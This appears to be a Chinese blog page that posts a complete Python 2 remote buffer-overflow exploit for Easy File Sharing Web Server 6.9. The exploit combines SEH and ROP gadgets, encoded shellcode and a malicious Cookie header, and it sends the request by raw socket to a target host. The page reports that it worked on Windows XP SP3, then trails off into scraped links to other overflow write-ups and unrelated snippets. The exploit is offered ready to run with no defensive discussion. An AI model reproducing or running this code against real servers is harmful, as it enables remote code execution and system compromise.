Easy File Sharing Web Server 6.9远程溢出漏洞
from struct import pack
import socket,sys
import os host="192.168.109.129"
port=80 junk0 = "\x90" * 80 call_edx=pack('<L',0x1001D8C8) junk1="\x90" * 396
ppr=pack('<L',0x10010101)
crafted_jmp_esp=pack('<L',0xA4523C15) test_bl=pack('<L',0x10010125) kungfu=pack('<L',0x10022aac)
kungfu+=pack('<L',0xDEADBEEF)
kungfu+=pack('<L',0xDEADBEEF)
kungfu+=pack('<L',0x1001a187)
kungfu+=pack('<L',0x1002466d) nopsled="\x90" * 20 shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50") payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode buf="GET /vfolder.ghp HTTP/1.1\r\n"
buf+="User-Agent: Mozilla/4.0\r\n"
buf+="Host:" + host + ":" + str(port) + "\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf+="Accept-Language: en-us\r\n"
buf+="Accept-Encoding: gzip, deflate\r\n"
buf+="Referer: http://" + host + "/\r\n"
buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
buf+="Conection: Keep-Alive\r\n\r\n" print "[*] Connecting to Host " + host + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((host, port))
print "[*] Connected to " + host + "!"
except:
print "[!] " + host + " didn't respond\n"
sys.exit(0) print "[*] Sending malformed request..."
s.send(buf) print "[!] Exploit has been sent!\n"
s.close()
成功在win xp sp3上溢出
图一 溢出前
图二 溢出后
Easy File Sharing Web Server 6.9远程溢出漏洞的更多相关文章
- MS17-010远程溢出漏洞 - 永恒之蓝 [CVE-2017-0143]
MS17-010远程溢出漏洞(永恒之蓝) Ti:2019-12-25 By:Mirror王宇阳 MS17-010 CVE-2017-0143 MS17-010 CVE-2017-0144 MS17-0 ...
- CVE-2017-7269-iis远程溢出漏洞复现
##01漏洞描述 cve_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)发现的.IIS 6.0开启Webdav服 ...
- 关于iis6.0远程溢出漏洞
漏洞描述 漏洞编号:CVE-2017-7269 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务的IIS 6.0 ...
- CVE-2012-0002(MS12-020)3389远程溢出漏洞
1:攻击机:Kali和windows皆可 2:目标机:windows XP系统(开启3389) Kali测试: search m12-020 搜索ms12-020 use auxiliary/dos/ ...
- 浏览器远程编写python代码--jupyter web server
公司分配了开发机,偶尔需要写一些python自动化脚本.为了提高编写效率,可以开发机上起一个jupyter web server,然后在电脑chrome浏览器进行编辑. 以下步骤均在开发机上操作. 安 ...
- Setting up Django and your web server with uWSGI and nginx
https://uwsgi.readthedocs.io/en/latest/tutorials/Django_and_nginx.html Setting up Django and your we ...
- Adding AirDrop File Sharing Feature to Your iOS Apps
http://www.appcoda.com/ios7-airdrop-programming-tutorial/ Adding AirDrop File Sharing Feature to You ...
- [r]Setting up Django and your web server with uWSGI and nginx
Setting up Django and your web server with uWSGI and nginx This tutorial is aimed at the Django user ...
- Another option for file sharing(转)
原文地址 https://security.googleblog.com/2017/02/another-option-for-file-sharing.html Another option fo ...
随机推荐
- [转]大整数算法[11] Karatsuba乘法
★ 引子 前面两篇介绍了 Comba 乘法,最后提到当输入的规模很大时,所需的计算时间会急剧增长,因为 Comba 乘法的时间复杂度仍然是 O(n^2).想要打破乘法中 O(n^2) ...
- Dummynet模拟高时延网络场景(Windows7)
如果安装时出现:my_socket failed 2, cannot talk to kernel module 请查看是否以管理员方式运行,如果是,再判断当前操作系统是否为Win7 64位,如果是, ...
- Oracle和MySQL的高可用方案对比【转】
关于Oracle和MySQL的高可用方案,其实一直想要总结了,就会分为几个系列来简单说说.通过这样的对比,会对两种数据库架构设计上的细节差异有一个基本的认识.Oracle有一套很成熟的解决方案.用我在 ...
- Linux 获取网关地址
route命令的用法:操作或者显示IP路由表route:DESCRIPTION Route manipulates the kernel's IP routing tables. Its primar ...
- Github中展示demo
原文链接http://www.jianshu.com/p/75e30889e70a 第一步:找到Settings,点击 第二步:找到githubPages点击none,切换到master branch ...
- SP_attach_db 添加数据库文件
SP_attach_db 用法如下: EXEC SP_attach_db @dbname = N'目标数据库名', //这是你要引入后的数据库名. ...
- 如何使用django+celery+RabbitMQ实现异步执行
1)安装需要安装RabbitMQ.Celery和Django-celeryCelery和Django-celery的安装直接pip就好 2)修改settings.py在INSTALLED_APPS中加 ...
- ubuntu16.04 安装 caffe cuda 相关流程
不多说了,经历了很多莫名其妙的错误最后终于安装好了,直接放安装脚本: #!/bin/bash #安装时要注意有些库可能安装失败以及安装caffe有和protobuf相关错误时可能需要重新对protob ...
- 使用EasyWechat快速开发微信公众号支付
前期准备: 申请微信支付后, 会收到2个参数, 商户id,和商户key.注意,这2个参数,不要和微信的参数混淆.微信参数: appid, appkey, token支付参数: merchant_id( ...
- pytest的参数化测试
感觉在单元测试当中可能有用, 但在django这种框架中,用途另一说. import pytest import tasks from tasks import Task def test_add_1 ...